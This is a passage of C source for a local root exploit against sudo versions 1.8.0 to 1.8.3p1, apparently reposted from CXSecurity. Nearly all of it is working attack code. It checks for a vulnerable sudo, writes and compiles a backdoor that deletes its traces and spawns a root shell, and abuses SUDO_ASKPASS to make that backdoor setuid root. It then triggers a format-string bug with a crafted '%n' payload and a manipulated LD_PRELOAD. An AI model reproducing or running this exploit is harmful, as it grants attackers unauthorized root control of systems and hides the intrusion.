returnval; }; int is_sudo_vuln(){ int i, returnval = -1;; FILE *fp; char path[20]; char sudo_ver_cmd[50]; snprintf(sudo_ver_cmd, sizeof(sudo)+3,"%s -V", sudo); fp = popen(sudo_ver_cmd, "r"); if (fp == NULL) { printf("[-] Failed to get sudo's version\n[-]Exiting.." ); exit(0); } fgets(path, 21, fp); memmove (s_version, path+13,5); for (i = 0; i < 4; i++){ if (strcmp(s_version, vuln_sudo_versions[i]) == 0){ printf("[+] Found a vuln sudo version: %s\n", s_version); returnval = 1; } } return returnval; }; int write_backdoor(){ int returnval = 1; char askpass[100], compile_bd[100]; char bdcode[] = "#include <stdio.h>\r\n" "#include <stdlib.h>\r\n" "int main(int argc, char **argv){\r\n" " printf(\"[+] Getting root..!\\n\");\r\n" " setresuid(0,0,0);\r\n" " printf(\"[+] Cleaning system.\\n\");\r\n" " remove(\"e\"); remove(\"e.c\"); remove(\"e.sh\");\r\n" " printf(\"[+] Launching root shell!\\n\");\r\n" " system(\"/bin/sh\");\r\n" " exit(0);\r\n" "}\r\n"; FILE *fp = fopen(BACKDOOR,"wb"); if (fp == NULL) { printf("[-] Failed to write backdoor on the target, check your permissions\n" ); returnval = -1; }else{ printf("[+] Writing backdoor: %s\n", BACKDOOR); } fwrite(bdcode, 1, sizeof(bdcode)-1, fp); fclose(fp); memset(compile_bd, 0x00, sizeof(compile_bd)); snprintf(compile_bd, sizeof(BACKDOOR)+sizeof(BD_COMPILED)+17,"/usr/bin/gcc %s -o %s", BACKDOOR, BD_COMPILED); printf("[+] Compiling backdoor: %s\n", BD_COMPILED); fp = popen(compile_bd, "r"); if (fp == NULL) { printf("[-] Failed to compile the backdoor, check the gcc path\n" ); returnval = -1; } fclose(fp); memset(askpass, 0x00, sizeof(askpass)); snprintf(askpass, sizeof(BD_COMPILED)*2+39,"#!/bin/sh\nchown root:root %s\nchmod 4777 %s\n", BD_COMPILED, BD_COMPILED); fp = fopen(SUDO_ASKPASS,"w"); if (fp == NULL) { printf("[-] Failed to write backdoor on the target, check your permissions\n" ); returnval = -1; }else{ printf("[+] Writing SUDO_ASKPASS file: %s\n", SUDO_ASKPASS); } fwrite(askpass, 1, sizeof(askpass)-1, fp); fclose(fp); chmod(SUDO_ASKPASS, 0755); return returnval; }; void *set_env(){ int i = 0; char ld_preload_evar[OFFSET] = "LD_PRELOAD="; char user_details[OFFSET] = {0x1f, 0x46, 0x01, 0x40}; char sudo_askpass_evar[40]; for (i=0; i<(OFFSET/4); i++){ memcpy(user_details+(i*4), user_details, sizeof(int)); } memmove (ld_preload_evar+11, user_details , sizeof(user_details)); memset(sudo_askpass_evar, 0x00, sizeof(sudo_askpass_evar)); snprintf(sudo_askpass_evar, sizeof(SUDO_ASKPASS)+13,"SUDO_ASKPASS=%s", SUDO_ASKPASS); // set our environment putenv(ld_preload_evar); putenv(sudo_askpass_evar); }; void *kill_sudo(){ char fmtstring[] = "%20$08n %*482$ %*2850$ %1073741824$"; char *args[] = { fmtstring, "-D9", "-A", "", NULL}; // trigger the vuln execve(sudo, args, environ); }; void *pop_shell(){ // set our environment unsetenv("LD_PRELOAD"); unsetenv("SUDO_ASKPASS"); char *exploit_args[] = { BD_COMPILED, NULL }; execve(BD_COMPILED, exploit_args, environ); }; Sursa: sudo_debug 1.8.0-1.8.3p1 format string root exploit - CXSecurity.com